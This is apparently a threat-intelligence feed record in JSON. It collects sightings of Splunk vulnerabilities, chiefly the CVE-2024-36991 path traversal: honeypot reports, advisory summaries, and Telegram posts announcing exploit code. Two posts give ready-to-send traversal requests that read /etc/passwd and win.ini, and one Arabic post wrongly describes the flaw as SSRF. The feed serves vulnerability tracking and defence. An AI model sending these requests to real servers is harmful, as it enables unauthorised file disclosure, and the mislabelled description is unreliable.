{"vulnerability": "CVE-2024-3699", "sightings": [{"uuid": "69ec30aa-2207-44ed-b3c9-063bde080aa0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-07)", "content": "", "creation_timestamp": "2025-05-07T00:00:00.000000Z"}, {"uuid": "46765e74-0325-47a6-a54f-e43583055afe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-04)", "content": "", "creation_timestamp": "2025-05-04T00:00:00.000000Z"}, {"uuid": "33f02729-a5a8-4753-a569-e4608da17599", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-04)", "content": "", "creation_timestamp": "2025-05-04T00:00:00.000000Z"}, {"uuid": "f091c5f8-c07e-4427-988a-d998cede4c85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "https://bsky.app/profile/rexkyris.bsky.social/post/3lxnk2caous2p", "content": "", "creation_timestamp": "2025-08-30T21:42:12.957099Z"}, {"uuid": "4a58dca3-5bcd-4d61-9ab4-11dffd654d40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-07)", "content": "", "creation_timestamp": "2025-05-07T00:00:00.000000Z"}, {"uuid": "5be242b2-a61b-4c33-a585-7ff1c21be8d1", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "MISP/f2f93f16-9318-44b1-9be3-2d3346ca540c", "content": "", "creation_timestamp": "2025-08-10T18:27:44.000000Z"}, {"uuid": "02f06b66-0c6a-4171-994a-d81d51534353", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-08)", "content": "", "creation_timestamp": "2025-05-08T00:00:00.000000Z"}, {"uuid": "fc049760-aa43-438a-bc31-02b118f33cee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "MISP/f2f93f16-9318-44b1-9be3-2d3346ca540c", "content": "", "creation_timestamp": "2025-09-10T07:47:56.000000Z"}, {"uuid": "a4a0b124-210d-4c7f-a476-f7db5fb01aa1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36998", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mcz2i4jvyf2r", "content": "", "creation_timestamp": "2026-01-22T11:12:06.447650Z"}, {"uuid": "4f83d2d0-029c-481d-9003-04ea71e59c21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mfbkl44vos2x", "content": "", "creation_timestamp": "2026-02-20T07:11:44.003715Z"}, {"uuid": "f49aa3d9-088a-4469-b823-789cc6a1bf37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": 
"https://t.me/GithubRedTeam/7885", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC for CVE-2024-36991: Will attempt to read Splunk /etc/passwd file\nURL\uff1ahttps://github.com/bigb0x/CVE-2024-36991\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-06T00:54:38.000000Z"}, {"uuid": "3b5b556d-a755-42a9-8b19-cfa95823dd0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36996", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1824", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-36996\n\ud83d\udd39 Description: In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10 and Splunk Cloud Platform versions below 9.1.2312.109, an attacker could determine whether or not another user exists on the instance by deciphering the error response that they would likely receive from the instance when they attempt to log in. This disclosure could then lead to additional brute-force password-guessing attacks. This vulnerability would require that the Splunk platform instance uses the Security Assertion Markup Language (SAML) authentication scheme.\n\ud83d\udccf Published: 2024-07-01T16:30:41.186Z\n\ud83d\udccf Modified: 2025-01-15T17:05:44.757Z\n\ud83d\udd17 References:\n1. 
https://advisory.splunk.com/advisories/SVD-2024-0716", "creation_timestamp": "2025-01-15T17:55:07.000000Z"}, {"uuid": "4aecac0e-9ab6-481d-b138-e12f7589cced", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/cKure/13269", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 PoC for CVE-2024-36991: This exploit will attempt to read Splunk /etc/passwd file.\n\nhttps://github.com/bigb0x/CVE-2024-36991", "creation_timestamp": "2024-07-12T02:03:25.000000Z"}, {"uuid": "6cfe4bd8-4fad-49e6-8f18-81b213a52385", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36992", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1107", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-36992\n\ud83d\udd39 Description: In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10 and Splunk Cloud Platform versions below 9.1.2312.200 and 9.1.2308.207, a low-privileged user that does not hold the admin or power Splunk roles could craft a malicious payload through a View that could result in execution of unauthorized JavaScript code in the browser of a user. The \u201curl\u201d parameter of the Dashboard element does not have proper input validation to reject invalid URLs, which could lead to a Persistent Cross-site Scripting (XSS) exploit.\n\ud83d\udccf Published: 2024-07-01T16:30:51.507Z\n\ud83d\udccf Modified: 2025-01-09T21:36:57.174Z\n\ud83d\udd17 References:\n1. 
https://advisory.splunk.com/advisories/SVD-2024-0712", "creation_timestamp": "2025-01-09T22:16:07.000000Z"}, {"uuid": "657cc440-9a70-4298-9c3d-bc91f903454c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36995", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1108", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-36995\n\ud83d\udd39 Description: In Splunk Enterprise versions below 9.2.2, 9.1.5, and 9.0.10 and Splunk Cloud Platform versions below 9.1.2312.200 and 9.1.2308.207, a low-privileged user that does not hold the admin or power Splunk roles could create experimental items.\n\ud83d\udccf Published: 2024-07-01T16:52:57.700Z\n\ud83d\udccf Modified: 2025-01-09T21:36:30.507Z\n\ud83d\udd17 References:\n1. https://advisory.splunk.com/advisories/SVD-2024-0715\n2. https://research.splunk.com/application/84afda04-0cd6-466b-869e-70d6407d0a34", "creation_timestamp": "2025-01-09T22:16:09.000000Z"}, {"uuid": "bbad8687-15ae-4297-a300-305c52102276", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7888", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-36991: Path traversal that affects Splunk Enterprise on Windows versions below 9.2.2, 9.1.5, and 9.0.10\nURL\uff1ahttps://github.com/th3gokul/CVE-2024-36991\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-06T15:51:16.000000Z"}, {"uuid": "971898fa-00e7-4608-b391-5e98b315062c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", 
"source": "https://t.me/realLulzSec/11767", "content": "cve-2024-36991\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1\n\n#exploit  #poc", "creation_timestamp": "2024-07-07T12:27:09.000000Z"}, {"uuid": "8160d65b-3d83-4140-9117-24408706e855", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/4i6s3KfgWVh_DHJQiP6LOg4zOt9ZFvgpOgBykl90WfOOGjE", "content": "", "creation_timestamp": "2025-07-06T09:00:05.000000Z"}, {"uuid": "c76c0439-892a-4430-ae2d-b558e8dc5b14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/YYbp8A9GMf8S2ZHygr8s4p3ZiOzWHZG8LUtOUPbma0fC_9Yx", "content": "", "creation_timestamp": "2024-07-13T23:43:32.000000Z"}, {"uuid": "b3ed818a-5c7f-4e3f-b7df-799164d6cf88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/ZFIen287iSvZiRFjAWLrPXmFw1-8T2ZoBZdpp1iPhBx88g", "content": "", "creation_timestamp": "2024-07-07T12:50:34.000000Z"}, {"uuid": "ff681158-83e1-40cf-86f4-fa5ac27c22e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1183", "content": "cve-2024-36991\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1\n\nGET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1\n\n#exploit  #poc", 
"creation_timestamp": "2024-07-07T12:27:09.000000Z"}, {"uuid": "003e6577-76e1-46c9-ba6d-d77312563dc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/malwaremanzero/121", "content": "CVE-2024-36991 \u062f\u064a \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0627\u0643\u062a\u0634\u0641\u0648\u0647\u0627 \u0641\u064a \u0628\u0639\u0636 \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u0627\u062a \u0645\u0646 \u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0648\u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0627\u0644\u0644\u064a \u0628\u062a\u0633\u062a\u063a\u0644 \u0636\u0639\u0641 \u0641\u064a \u0627\u0644\u062a\u0639\u0627\u0645\u0644 \u0645\u0639 \u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0627\u0644\u062c\u0627\u0646\u0628\u064a\u0629 SSRF \u0623\u0648 Server-Side Request Forgery \u0627\u0644\u0640 SSRF \u062f\u064a \u062a\u0642\u0646\u064a\u0629 \u0628\u064a\u0633\u062a\u062e\u062f\u0645\u0647\u0627 \u0627\u0644\u0647\u0627\u0643\u0631\u0632 \u0639\u0634\u0627\u0646 \u064a\u062a\u062d\u0643\u0645\u0648\u0627 \u0641\u064a \u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0639\u0646 \u0628\u064f\u0639\u062f \u0648\u062f\u0647 \u0628\u064a\u0633\u0645\u062d \u0644\u0647\u0645 \u0625\u0646\u0647\u0645 \u064a\u0646\u0641\u0630\u0648\u0627 \u0637\u0644\u0628\u0627\u062a \u0645\u0634 \u0645\u0635\u0631\u062d \u0628\u0647\u0627 \u0644\u0645\u0648\u0627\u0631\u062f \u062f\u0627\u062e\u0644\u064a\u0629 \u0623\u0648 \u062e\u0627\u0631\u062c\u064a\u0629 \u0645\u0646 \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0627\u0644\u0647\u0627\u0643\u0631 \u0628\u064a\u0642\u062f\u0631 \u064a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0646\u0648\u0639 \u062f\u0647 \u0645\u0646 
\u0627\u0644\u0647\u062c\u0645\u0627\u062a \u0639\u0634\u0627\u0646 \u064a\u0642\u062a\u062d\u0645 \u0634\u0628\u0643\u0627\u062a \u0627\u0644\u0634\u0631\u0643\u0627\u062a \u0623\u0648 \u064a\u0633\u0631\u0642 \u0628\u064a\u0627\u0646\u0627\u062a \u062d\u0633\u0627\u0633\u0629 \u0623\u0648 \u064a\u0646\u0641\u0630 \u0647\u062c\u0645\u0627\u062a \u0623\u0643\u0628\u0631 \u0639\u0644\u0649 \u0627\u0644\u0628\u0646\u064a\u0629 \u0627\u0644\u062a\u062d\u062a\u064a\u0629 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a\u0629 \u0627\u0644\u0647\u062f\u0641 \u0645\u0646 CVE-2024-36991 \u0647\u0648 \u062a\u0648\u0636\u064a\u062d \u0625\u0632\u0627\u064a \u0627\u0644\u0646\u0648\u0639 \u062f\u0647 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0628\u064a\u062a\u0645 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647 \u0648\u062e\u0637\u0648\u0631\u062a\u0647 \u0627\u0644\u0643\u0628\u064a\u0631\u0629 \u0625\u0632\u0627\u064a\u061f \u064a\u0639\u0646\u064a \u0627\u0644\u0647\u0627\u0643\u0631 \u0628\u064a\u0642\u062f\u0631 \u064a\u0628\u0639\u062a \u0637\u0644\u0628 HTTP \u0645\u0646 \u062e\u0644\u0627\u0644 \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0628\u062f\u0644 \u0645\u0627 \u064a\u0628\u0639\u062a \u0645\u0646 \u062c\u0647\u0627\u0632\u0647 \u0627\u0644\u0634\u062e\u0635\u064a \u0648\u062f\u0647 \u0628\u064a\u062e\u0641\u064a \u0647\u0648\u064a\u062a\u0647 \u0648\u0628\u064a\u0635\u0639\u0628 \u062a\u062a\u0628\u0639\u0647 \u0627\u0644\u0646\u0648\u0639 \u062f\u0647 \u0645\u0646 \u0627\u0644\u0647\u062c\u0645\u0627\u062a \u0628\u064a\u0639\u062a\u0645\u062f \u0639\u0644\u0649 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0636\u0639\u0641 \u0641\u064a \u0622\u0644\u064a\u0629 \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0635\u062d\u0629 \u0627\u0644\u0639\u0646\u0627\u0648\u064a\u0646 URLs \u0623\u0648 \u0639\u062f\u0645 \u062a\u0641\u0639\u064a\u0644 \u0642\u064a\u0648\u062f 
\u0635\u0627\u0631\u0645\u0629 \u0639\u0644\u0649 \u0627\u0644\u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0648\u0627\u0631\u062f\u0629 CVE-2024-36991 \u0645\u0645\u0643\u0646 \u062a\u0633\u062a\u062e\u062f\u0645 \u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0628\u064a\u0627\u0646\u0627\u062a \u062d\u0633\u0627\u0633\u0629 \u0632\u064a \u0645\u0641\u0627\u062a\u064a\u062d API \u0623\u0648 \u0623\u0643\u0648\u0627\u062f \u0627\u0644\u062f\u062e\u0648\u0644 \u0644\u0644\u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u062f\u0627\u062e\u0644\u064a\u0629 \u0623\u0648 \u062d\u062a\u0649 \u062a\u0646\u0641\u064a\u0630 \u0623\u0643\u0648\u0627\u062f \u062e\u0628\u064a\u062b\u0629 \u062c\u0648\u0647 \u0627\u0644\u0634\u0628\u0643\u0629 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\u0629 \u0628\u0645\u062c\u0631\u062f \u0645\u0627 \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0647\u0627\u0643\u0631 \u0628\u064a\u0642\u062f\u0631 \u064a\u062a\u062d\u0643\u0645 \u0641\u064a \u062a\u062f\u0641\u0642 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0628\u064a\u0646 \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0648\u0627\u0644\u0645\u0635\u0627\u062f\u0631 \u0627\u0644\u062a\u0627\u0646\u064a\u0629 \u0648\u062f\u0647 \u0628\u064a\u062f\u064a\u0647 \u0641\u0631\u0635\u0629 \u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0623\u0646\u0638\u0645\u0629 \u0623\u0643\u062a\u0631 \u0623\u0648 \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0623\u0643\u062a\u0631 \u062d\u0633\u0627\u0633\u064a\u0629 \u0643\u0645\u0627\u0646 \u0645\u0645\u0643\u0646 \u064a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0644\u062a\u0646\u0641\u064a\u0630 \u0647\u062c\u0645\u0627\u062a DDoS \u0623\u0648 Distributed Denial of Service \u0639\u0646 \u0637\u0631\u064a\u0642 \u0625\u063a\u0631\u0627\u0642 \u0627\u0644\u0646\u0638\u0627\u0645 \u0628\u0637\u0644\u0628\u0627\u062a 
\u0645\u062a\u0643\u0631\u0631\u0629 \u0644\u062d\u062f \u0645\u0627 \u064a\u0639\u0637\u0644\u0647 \u0639\u0644\u0634\u0627\u0646 \u0643\u062f\u0647 \u0645\u062f\u064a\u0631\u064a \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0648\u0645\u0647\u0646\u062f\u0633\u064a \u0627\u0644\u0623\u0645\u0646 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a \u0644\u0627\u0632\u0645 \u064a\u062a\u0623\u0643\u062f\u0648\u0627 \u0625\u0646\u0647\u0645 \u0628\u064a\u062d\u062f\u062b\u0648\u0627 \u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0648\u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0644\u0622\u062e\u0631 \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u0627\u062a \u0627\u0644\u0644\u064a \u0628\u062a\u0639\u0627\u0644\u062c \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0648\u0643\u0645\u0627\u0646 \u0644\u0627\u0632\u0645 \u064a\u0641\u0639\u0644\u0648\u0627 \u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0636\u0631\u0648\u0631\u064a\u0629 \u0632\u064a \u0641\u062d\u0635 \u0627\u0644\u0639\u0646\u0627\u0648\u064a\u0646 URLs \u0648\u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0635\u0644\u0627\u062d\u064a\u062a\u0647\u0627 \u0648\u062a\u0642\u064a\u064a\u062f \u0627\u0644\u0648\u0635\u0648\u0644 \u0644\u0644\u0645\u0648\u0627\u0631\u062f \u0627\u0644\u062f\u0627\u062e\u0644\u064a\u0629 \u0648\u0639\u062f\u0645 \u0627\u0644\u062b\u0642\u0629 \u0641\u064a \u0627\u0644\u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0648\u0627\u0631\u062f\u0629 \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u0645\u0634 \u0645\u0648\u062b\u0648\u0642\u0629 \u0627\u0644\u0647\u0627\u0643\u0631 \u0627\u0644\u0645\u062d\u062a\u0631\u0641 \u0645\u0645\u0643\u0646 \u064a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0639\u0634\u0627\u0646 \u064a\u062d\u0642\u0642 \u0623\u0647\u062f\u0627\u0641 \u0643\u062a\u064a\u0631\u0629 \u0632\u064a \u0633\u0631\u0642\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a 
\u0627\u0644\u062d\u0633\u0627\u0633\u0629 \u062a\u0639\u0637\u064a\u0644 \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0623\u0648 \u062d\u062a\u0649 \u0625\u0639\u062f\u0627\u062f \u0647\u062c\u0645\u0627\u062a \u0623\u0643\u0628\u0631 \u0648\u0623\u0639\u0642\u062f \u0644\u0627\u0632\u0645 \u0646\u062a\u0639\u0627\u0645\u0644 \u0645\u0639 \u0627\u0644\u0646\u0648\u0639 \u062f\u0647 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0628\u062c\u062f\u064a\u0629 \u0643\u0627\u0645\u0644\u0629 \u0644\u0625\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627 \u0645\u0645\u0643\u0646 \u064a\u0624\u062f\u064a \u0644\u062e\u0633\u0627\u0626\u0631 \u0643\u0628\u064a\u0631\u0629 \u0641\u064a \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0648\u062a\u0648\u0642\u0641 \u0627\u0644\u062e\u062f\u0645\u0627\u062a \u0627\u0644\u0645\u0647\u0645\u0629 \u0648\u0643\u0645\u0627\u0646 \u062a\u0623\u062b\u064a\u0631 \u0633\u0644\u0628\u064a \u0639\u0644\u0649 \u0633\u0645\u0639\u0629 \u0627\u0644\u0634\u0631\u0643\u0627\u062a \u0648\u0627\u0644\u0645\u0624\u0633\u0633\u0627\u062a \u0627\u0644\u0644\u064a \u0628\u062a\u062a\u0639\u0631\u0636 \u0644\u0644\u0647\u062c\u0648\u0645 \u0641\u064a \u0627\u0644\u0646\u0647\u0627\u064a\u0629 \u0646\u0642\u062f\u0631 \u0646\u0642\u0648\u0644 \u0625\u0646 CVE-2024-36991 \u0648\u0627\u062d\u062f\u0629 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u062e\u0637\u064a\u0631\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u062a\u0637\u0644\u0628 \u0648\u0639\u064a \u062a\u0642\u0646\u064a \u0639\u0627\u0644\u064a \u0648\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0623\u0645\u0646\u064a\u0629 \u0635\u0627\u0631\u0645\u0629 \u0639\u0634\u0627\u0646 \u0646\u0645\u0646\u0639 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627 \u0648\u0646\u062d\u0645\u064a \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0648\u0627\u0644\u0634\u0628\u0643\u0627\u062a \u0645\u0646 \u0627\u0644\u062a\u0647\u062f\u064a\u062f\u0627\u062a 
\u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u0632\u064a\u062f \u064a\u0648\u0645 \u0628\u0639\u062f \u064a\u0648\u0645\n\n\u0631\u0627\u0628\u0637 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644", "creation_timestamp": "2024-07-21T22:52:36.000000Z"}, {"uuid": "4828712f-6985-4bd3-a9d9-ac27721a5e78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/1644", "content": "\ud83d\udea8PoC RELEASED\ud83d\udea8POC for CVE-2024-36991: This exploit will attempt to read Splunk /etc/passwd file.\n\nhttps://x.com/DarkWebInformer/status/1810303232775700641", "creation_timestamp": "2024-07-08T15:24:45.000000Z"}, {"uuid": "5f1a79be-2563-4b01-9db6-85489c1b8538", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/6999", "content": "\u200aCritical Splunk Vulnerability Exploited Using Crafted GET Commands\n\nhttps://cybersecuritynews.com/critical-splunk-vulnerability-cve-2024-36991-exploit/", "creation_timestamp": "2024-07-23T10:41:53.000000Z"}, {"uuid": "3db5b427-2eef-41e2-828e-388d8c9a1617", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "Telegram/Tf7RAmO5ucsEOjBgsAIXqXRYfzXLNzHzE3kkLB18s4bauF0", "content": "", "creation_timestamp": "2025-03-31T05:00:07.000000Z"}, {"uuid": "7500735b-8405-4859-b7ca-b932a27d371e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", 
"source": "https://t.me/lostsec/756", "content": "POC for Splunk CVE-2024-36991\nhttps://github.com/bigb0x/CVE-2024-36991", "creation_timestamp": "2024-07-06T11:33:13.000000Z"}, {"uuid": "17285d2b-237f-47b6-a9d4-fb5d58f093b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-36991", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/396", "content": "Tools - Hackers Factory \n\nExploit \n\n1. CVE-2024-36991:\nSplunk Enterprise Path traversal\nhttps://github.com/bigb0x/CVE-2024-36991\n\n2. CVE-2024-22274:\nRCE in VMware vCenter Server\nhttps://github.com/mbadanoiu/CVE-2024-22274\n\n3. CVE-2024-36401:\nGeoServer Unauth RCE\nhttps://github.com/bigb0x/CVE-2024-36401\n\nGitHub - payloadbox/sql-injection-payload-list: SQL Injection Payload List\n\nhttps://github.com/payloadbox/sql-injection-payload-list\n\nGitHub - ThatNotEasy/CVE-2024-27956: Perform with massive Wordpress SQLI 2 RCE\n\nhttps://github.com/ThatNotEasy/CVE-2024-27956\n\nMemProcFS 5.10 released! Support for Windows 11 24H2 added!\n\nMemProcFS - super fast memory forensics of live memory and memory dumps!\n\nhttps://github.com/ufrisk/MemProcFS\n\nCVE-2024-37081: The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.\u00a0\n\nhttps://github.com/Mr-r00t11/CVE-2024-37081\n\nCVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer.\n\nPOC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.\n\nhttps://github.com/bigb0x/CVE-2024-36401\n\nCVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. 
